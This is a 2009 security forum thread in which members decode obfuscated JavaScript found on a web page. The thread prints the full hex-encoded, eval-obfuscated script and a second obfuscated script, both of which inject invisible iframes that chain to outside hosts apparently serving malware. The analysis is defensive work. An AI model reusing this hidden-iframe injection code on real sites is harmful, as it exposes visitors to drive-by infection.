.

Decode Urgent Help Needed

<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Fri Jul 24, 2009 5:54 pm

Decode Urgent Help Needed

I need some help here. Anybody have and idea what this does?
336425333425333725333025323025373325373425373925366325363525336425323725373625363925373325 3639253632253639253663253639253734253739253361'+c26z3d+'25363825363925363425363425 3635253665253237253365253363253266253639253636253732253631'+c26z3d+'25366425363525 33652729293B7D7661'+c26z3d+'72206D796961'+c26z3d+'3D747275653B3C2F736372 6970743E';r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

How could I decode this?
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

alan

User avatar

Newbie
Newbie

Posts: 48

Joined: Sat Dec 27, 2008 11:55 pm

Post Fri Jul 24, 2009 6:27 pm

Re: Decode Urgent Help Needed

how far have you gotten?

putting this portion into

3D747275653B3C2F7363726970743E

hex 2 ascii gives

=true;</script>

which looks reasonable! but i get stuck there!
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Fri Jul 24, 2009 6:29 pm

Re: Decode Urgent Help Needed

I initially tried the hex to ascii but had n luck. I will give it another shot.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

alan

User avatar

Newbie
Newbie

Posts: 48

Joined: Sat Dec 27, 2008 11:55 pm

Post Fri Jul 24, 2009 6:57 pm

Re: Decode Urgent Help Needed

i think you could be missing a good portion of it, i've sent you a private message which may or may not be relavent
<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Fri Jul 24, 2009 6:58 pm

Re: Decode Urgent Help Needed

by first impressions id say its an XSS attack... a full decode would be required.
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Fri Jul 24, 2009 7:01 pm

Re: Decode Urgent Help Needed

Thanks for all the help guys. I appreciate it.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Fri Jul 24, 2009 7:59 pm

Re: Decode Urgent Help Needed

The rough translation is this:

  Code:
style='visibility:hidden'></iframe>'));}var myia=true;</script> r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));


You are indeed missing a good portion of it.  I would agree with Jhaddix in that it is likely part of an XSS attack.
~~~~~~~~~~~~~~
Ketchup
<<

UNIX

User avatar

Hero Member
Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Fri Jul 24, 2009 11:58 pm

Re: Decode Urgent Help Needed

I too would say, that a part is missing. Do you have the rest of it or were you just asking to get an idea what this could be?
<<

Jhaddix

User avatar

Sr. Member
Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Sat Jul 25, 2009 1:31 am

Re: Decode Urgent Help Needed

ketchup's decode makes me think its a clickjacking attack, injected via xss.
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Sat Jul 25, 2009 9:27 am

Re: Decode Urgent Help Needed

<script>c26z634='';r28bd46b6=document;r28bd46b6.write('<scr'+'ipt>function r4373bbe(r52973acb7a){return ev'+c26z634+'al(r52973acb7a); }</scr'+'ipt>');  function c26e34eb22refb13(re3c3827f47){ function r8157f3fa362(){var r99011=16;return r99011;} var zf4='';return (r4373bbe('parseI'+zf4+'nt')(re3c3827f47,r8157f3fa362()));}function r3cf3d(rcba5aab2){ function r2554044(){var rc0ee24fd3=2;return rc0ee24fd3;} var r3ff7d7403c7='';r17e8d5766='fromCh';r26431=String[r17e8d5766+'arCode'];for(r7bb6b022=0;r7bb6b022<rcba5aab2.length;r7bb6b022+=r2554044()){ r3ff7d7403c7+=(r26431(c26e34eb22refb13(rcba5aab2.substr(r7bb6b022,r2554044()))));}return r3ff7d7403c7;} var r6671d26afb='3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+'297B646F63756D656E742E777269746528756 E65736361'+c26z634+'7065282027253363253639253636253732253631'+c26z634+'253664253635253230253665253631'+c 26z634+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+c26z634 +'253266253266253737253737253737253265253631'+c26z634+'253732253665253638253635253664253264253634253639253631' ;+c26z634+'253664253631'+c26z634+'253665253734253265253665253663253266253366253237253262253464253631'+c26z634 +'253734253638253265253732253666253735253665253634253238253464253631'+c26z634+'253734253638253265253732253631' ;+c26z634+'253665253634253666253664253238253239253261'+c26z634+'253331'+c26z634+'25333025333925333925333 025333825323925326225323725333025363525333925333225333525363225323725323025373725363925363425373425363825336425333625333325333925 3230253638253635253639253637253638253734253364253331'+c26z634+'25333725333225323025373325373425373925366325363525336425 3237253736253639253733253639253632253639253663253639253734253739253361'+c26z634+'25363825363925363425363425363525366525 3237253365253363253266253639253636253732253631'+c26z634+'2536642536352533652729293B7D7661'+c26z634+'72206D796 961'+c26z634+'3D747275653B3C2F7363726970743E';r28bd46b6.write(r3cf3d(r6671d26afb));</script><script>check_content()</script>

<script>if(!myia){document.write(unescape
<iframe name=c26 src='hxxp://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=1 c72 style='visibility:hidden'></iframe>      
=true;</script>
));}va

thats what I have so far. Apparently they go from Hex 2 asscii and then ascii to binary
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 10:17 am

Re: Decode Urgent Help Needed

Well, they are obscuring the code a bit.  It's pretty common for goofy variable and function names to be used, like r58ss8a2, for example.  I cleaned up the code a little bit.  It looks like you are still missing some portion of it, although I doubt it is necessary.  The attack vector looks like a hidden IFRAME.

  Code:
<script>

spacer='';
doc=document;
doc.write('<scr'+'ipt>function unknown_function1(unknown_var1){return ev'+spacer+'al(unknown_var1); }</scr'+'ipt>');


function function1(func1_arg1)
{

  function setvar1()
  {
    var var1=16;
    return var1;
  }
  var spacer2='';
  return (unknown_function1('parseI'+spacer2+'nt')(func1_arg1,setvar1()));
}

function function2(func2_arg1)
{
  function setvar2()
  {
    var var2=2;
    return var2;
  }
  var return_string='';
  string1='fromCh';
  string2=String[string1+'arCode'];
  for(i=0;i<func2_arg1.length;i+=setvar2())
  {
    return_string+=(string2(function1(func2_arg1.substr(i,setvar2()))));
  }
  return return_string;
}

var attack_vector='3C7363726970743E69662821' +spacer+ '6D796961' +spacer+ '297B646F63756D656E742E777269746528756E65736361' +spacer+ '7065282027253363253639253636253732253631' +spacer+ '253664253635253230253665253631' +spacer+ '253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361' +spacer+ '253266253266253737253737253737253265253631' +spacer+ '253732253665253638253635253664253264253634253639253631' +spacer+ '253664253631' +spacer+ '253665253734253265253665253663253266253366253237253262253464253631' +spacer+ '253734253638253265253732253666253735253665253634253238253464253631' +spacer+ '253734253638253265253732253631' +spacer+ '253665253634253666253664253238253239253261' +spacer+ '253331' +spacer+ '253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331' +spacer+ '253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361' +spacer+ '253638253639253634253634253635253665253237253365253363253266253639253636253732253631' +spacer+ '2536642536352533652729293B7D7661' +spacer+ '72206D796961' +spacer+ '3D747275653B3C2F7363726970743E';

<!-- ***** The above attack_vector variable translates to the following: ***** -->
<!-- ***** This was added by ketchup ***** -->
<script>
if(!myia)
{
  document.write(unescape( "'<iframe name=c26 src='http://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=172 style='visibility:hidden'></iframe>'"));
}
var myia=true;
</script>
<!-- ***** end translation of attack_vector variable ***** -->



<!-- ********* here is where it appears they write the attack vector *********** -->
document.write(function2(attack_vector));

</script>

<script>
  check_content()
</script>
~~~~~~~~~~~~~~
Ketchup
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Sat Jul 25, 2009 10:22 am

Re: Decode Urgent Help Needed

Guys the help is GREATLY appreciated. So this looks like a XSS attack maybe as mentioned previously?
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 10:35 am

Re: Decode Urgent Help Needed

Yep, I am not sure exactly what that link is doing, but I am not brave to find out :)
~~~~~~~~~~~~~~
Ketchup
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 11:15 am

Re: Decode Urgent Help Needed

Here is what I pulled from the site referenced in the script.  I took the liberty of translating some of the code to make it more readable. 

This is interesting.  I will let you know if I find anything else.

  Code:
<!-- ad -->
<script type="text/javascript">
var filler1 = "lRusrktXDJJYrvSgerej";
var filler2 = "OsFFoXlSOQCXadLJskRb";
var filler3 = "jEfJhqTablBNAwUHCnrO";

var shellcode? = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99 z61z34z104z116z116z112z58z47z47z119z119z119z46z103z97z114z100z101z110z45z97z114z116z46z103z114z47z34z32z115z116z121z108z101z61z34 z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z5 8z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z 112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z1 08z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z1 14z97z109z101z62";

var filler4 = "mgpmcKufxlumukVYGnvu";
var filler5 = "FyzziVYoJTjQuBufAdRA";
var filler6 = "cUHXVBCVfUWXBJKmVWmB";

var array_var1 = shellcode?.split("z");

var filler7 = "EMwGVHsrdesOdfMoCHhk";
var filler8 = "sQVVvhKypribJcOSEVUP";
var filler9 = "gaVqDjIHFcWYXCCoEMiV";

var string_var1 = "";

var filler10 = "GmndopStCBOxlsqrCdDA";
var filler11 = "jWjVPaMREQRNXxbGzyyf";
var filler12 = "zAvXyXdyVbdHfvSeerMv";

for (var i=1; i<array_var1.length; i++)
{
  string_var1+=String.fromCharCode(array_var1[i]);
}
try
{
  document.write(string_var1);
}
catch(e)
{
}

var filler13 = "cEtIzLmeDzZbgWDQoxfq";
var filler14 = "nQFUmJkbGQRhsImNXTyo";
var filler15 = "fosYxelUyjIaDpPnYRyu";

</script>
<!-- /ad -->
</body></html>
   
<script>check_content()</script>
~~~~~~~~~~~~~~
Ketchup
<<

Ketchup

User avatar

Hero Member
Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 11:33 am

Re: Decode Urgent Help Needed

LOL, that's not shellcode.  I was over-analyzing it.   It's just another iframe:

  Code:
<iframe width="480" height="60" src="http://www.garden-art.gr/" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>


I traced it through a couple of more sites, and I am stuck here:

  Code:
<iframe width="480" height="60" src="http://ddosguard.info/vsetakoe/?96d440414dfad88fe5c6de195a254e50" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>


The hash value being passed to that URL seems to be some sort of authentication hash (md5).  I am guessing this one is either not valid or is disabled because I am not getting anything from this page.  If you alter the parameter or delete it, you get plain text on the page that resembles BASE64 encoding.  The BASE64 text varies depending on how you alter the parameter.  It doesn't appear to translate to anything readable, at least not in English.
Last edited by Ketchup on Sat Jul 25, 2009 12:12 pm, edited 1 time in total.
~~~~~~~~~~~~~~
Ketchup
Next

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software